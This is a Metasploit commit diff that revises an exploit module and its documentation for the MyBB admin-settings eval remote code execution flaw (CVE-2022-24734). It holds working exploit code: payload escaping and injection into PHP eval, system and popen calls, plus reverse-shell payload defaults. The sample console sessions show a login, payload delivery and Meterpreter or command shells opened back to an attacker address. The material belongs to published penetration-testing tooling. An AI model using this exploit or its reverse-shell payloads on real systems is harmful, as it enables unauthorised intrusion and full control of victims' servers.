Fixes from code review

cdelafuente-r7 · cdelafuente-r7 · commit b996f5ee494d · 2022-05-30T16:24:18.000+02:00
diff --git a/documentation/modules/exploit/multi/http/mybb_rce_cve_2022_24734.md b/documentation/modules/exploit/multi/http/mybb_rce_cve_2022_24734.md
@@ -1,10 +1,17 @@
 ## Vulnerable Application
 
-This exploit module leverages an improper input validation vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in the context of the user running the application.
+This exploit module leverages an improper input validation vulnerability in
+MyBB prior to `1.8.30` to execute arbitrary code in the context of the user
+running the application.
 
-MyBB Admin Control setting page calls PHP `eval` function with an unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting.
+MyBB Admin Control setting page calls PHP `eval` function with an unsanitized
+user input. The exploit adds a new setting, injecting the payload in the
+vulnerable field, and triggers its execution with a second request. Finally, it
+takes care of cleaning up and removes the setting.
 
-Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, myBB administrator role).
+Note that authentication is required for this exploit to work and the account
+must have rights to add or update settings (typically, myBB administrator
+role).
 
 ## Installation Steps
 
@@ -38,7 +45,7 @@ services:
 version: '3.8'
 ```
 - Create `nginx/default.conf`
-  ```
+```
   upstream mybb {
       server mybb:9000 weight=5;
   }
@@ -71,7 +78,7 @@ version: '3.8'
           fastcgi_param PATH_INFO $fastcgi_path_info;
       }
   }
-  ```
+```
 - Run `docker-compose up`.
 - Access the application at `http://127.0.0.1:8080/install` and finish the installation process.
 
@@ -82,17 +89,17 @@ version: '3.8'
   - Download PHP (Non Thread Safe) [here](http://windows.php.net/download/)
   - Extract everything to `C:\php`
   - run:
-    ```
+```
     cd C:\php
     set PHP_FCGI_CHILDREN=5
     set PHP_FCGI_MAX_REQUESTS=500
     php-cgi.exe -b 127.0.0.1:9999
-    ```
+```
 - Install Nginx:
   - Download Nginx [here](http://nginx.org/en/download.html)
   - Extract everything to `C:\nginx`
   - Set the following options to `C:\nginx\nginx.conf`
-    ```
+```
     worker_processes  auto;
     ...
 	server {
@@ -123,12 +130,12 @@ version: '3.8'
             fastcgi_param PATH_INFO $fastcgi_path_info;
         }
 	}
-    ```
+```
   - Run:
-    ```
+```
     cd C:\nginx
     start nginx.exe
-    ```
+```
 - Install MyBB
   - Follow the installation process [here](https://docs.mybb.com/1.8/install/).
 
@@ -269,28 +276,29 @@ BuildTuple   : i486-linux-musl
 Meterpreter  : x86/linux
 ```
 
-### Windows (target 3 - PowerShell (In-Memory))
+### Windows (target 3 - Windows (In-Memory))
 ```
-msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 3
-target => 3
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
+target => 4
 msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+
+[*] Powershell command length: 4160
 [*] Started reverse TCP handler on 192.168.1.44:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] MyBB forum found running at /
 [!] The service is running, but could not be validated.
 [*] Attempting login
 [+] Login successful!
 [*] Adding a malicious settings
-[*] Powershell command length: 6767
 [*] Adding a crafted configuration setting entry with the payload
 [+] Payload successfully sent
 [*] Triggering the payload execution
-[*] Sending stage (175174 bytes) to 192.168.1.215
-[*] Meterpreter session 5 opened (192.168.1.44:4444 -> 192.168.1.215:63818) at 2022-05-23 15:43:54 +0200
 [*] Removing the configuration setting
 [*] Grab the delete parameters
 [*] Send the delete request
 [*] Shell incoming...
+[*] Sending stage (175174 bytes) to 192.168.1.215
+[*] Meterpreter session 6 opened (192.168.1.44:4444 -> 192.168.1.215:59025) at 2022-05-30 15:58:01 +0200
 
 meterpreter > sysinfo
 Computer        : DC02
@@ -303,57 +311,7 @@ Meterpreter     : x86/windows
 ```
 
 
-### Windows (target 4 - Windows (In-Memory))
-```
-msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
-target => 4
-msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
-[*] Started reverse TCP handler on 192.168.1.44:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] MyBB forum found running at /
-[!] The service is running, but could not be validated.
-[*] Attempting login
-[+] Login successful!
-[*] Adding a malicious settings
-[*] Adding a crafted configuration setting entry with the payload
-[+] Payload successfully sent
-[*] Triggering the payload execution
-[*] Removing the configuration setting
-[*] Grab the delete parameters
-[*] Send the delete request
-[*] Shell incoming...
-[*] Command shell session 6 opened (192.168.1.44:4444 -> 192.168.1.215:63848) at 2022-05-23 15:44:23 +0200
-
-
-Shell Banner:
-Microsoft Windows [Version 10.0.17763.107]
-(c) 2018 Microsoft Corporation. All rights reserved.
-
-C:\nginx\www\admin>
------
-
-
-C:\nginx\www\admin>dir
-dir
- Volume in drive C has no label.
- Volume Serial Number is 4215-6DA6
-
- Directory of C:\nginx\www\admin
-
-05/19/2022  04:11 PM    <DIR>          .
-05/19/2022  04:11 PM    <DIR>          ..
-05/19/2022  04:11 PM    <DIR>          backups
-05/19/2022  04:11 PM    <DIR>          inc
-10/29/2021  12:00 AM            24,476 index.php
-05/19/2022  04:11 PM    <DIR>          jscripts
-05/19/2022  04:11 PM    <DIR>          modules
-05/19/2022  04:11 PM    <DIR>          styles
-               1 File(s)         24,476 bytes
-               7 Dir(s)  48,613,580,800 bytes free
-```
-
-
-### Windows (target 5 - Windows (Dropper))
+### Windows (target 4 - Windows (Dropper))
 ```
 msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
 target => 5
diff --git a/modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb b/modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb
@@ -74,21 +74,12 @@ def initialize(info = {})
               'Type' => :dropper
             }
           ],
-          [
-            'PowerShell (In-Memory)',
-            {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
-              'Type' => :psh_memory
-            }
-          ],
           [
             'Windows (In-Memory)',
             {
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' },
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
               'Type' => :in_memory
             }
           ],
@@ -114,7 +105,7 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('USERNAME', [ true, 'MyBB Admin CP uername' ]),
+        OptString.new('USERNAME', [ true, 'MyBB Admin CP username' ]),
         OptString.new('PASSWORD', [ true, 'MyBB Admin CP password' ]),
         OptString.new('TARGETURI', [ true, 'The URI of the MyBB application', '/'])
       ]
@@ -138,8 +129,6 @@ def check
     print_good("MyBB forum found running at #{target_uri.path}")
 
     return CheckCode::Detected
-  rescue ::Rex::ConnectionError => e
-    return CheckCode::Unknown("#{peer} - Could not connect to web service. Error: #{e}")
   end
 
   def login
@@ -196,39 +185,30 @@ def exploit
     case target['Type']
     when :in_memory
       execute_command(payload.encoded)
-    when :psh_memory
-      cmd = cmd_psh_payload(
-        payload.encoded,
-        payload_instance.arch.first,
-        { remove_comspec: true, encode_final_payload: true }
-      )
-      execute_command(cmd)
     when :dropper
       execute_cmdstager
     end
-  rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
   def send_payload(cmd)
     vprint_status('Adding a crafted configuration setting entry with the payload')
 
+    cmd = cmd.gsub(/\\/, '\\' => '\\\\')
+    cmd = cmd.gsub(/"/, '"' => '\\"')
+    cmd = cmd.gsub(/\$/, '$' => '\\$')
+
     case target['Platform']
     when 'php'
-      cmd = cmd.gsub(/"/, '"' => '\\"')
-      cmd = cmd.gsub(/\$/, '$' => '\\$')
       extra = "\" . eval(\"#{cmd}\") .\""
     when 'win'
-      cmd = cmd.gsub(/'/, "'" => "\\'")
       if target['Arch'] == ARCH_CMD
         # Force cmd to run in the background (only works for `cmd`)
-        extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\""
+        extra = "\" . pclose(popen(\"start /B #{cmd}\", \"r\")) .\""
       else
-        extra = "\" . system('#{cmd}') .\""
+        extra = "\" . system(\"#{cmd}\") .\""
       end
     else
-      cmd = cmd.gsub(/'/, "'" => "\\'")
-      extra = "\" . system('#{cmd} > /dev/null &') .\""
+      extra = "\" . system(\"#{cmd} > /dev/null &\") .\""
     end
 
     post_data = {
@@ -247,7 +227,9 @@ def send_payload(cmd)
     unless res.code == 302
       doc = res.get_html_document
       err = doc.xpath('//div[@class="error"]').text
-      fail_with(Failure::Unknown, "#{peer} - Exploit didn't work. Reason: #{err}")
+      fail_with(Failure::Unknown,
+                "#{peer} - The module expected a 302 response but received: "\
+                "#{res.code}. Exploit didn't work.#{" Reason: #{err}" if err.present?}")
     end
 
     vprint_good('Payload successfully sent')
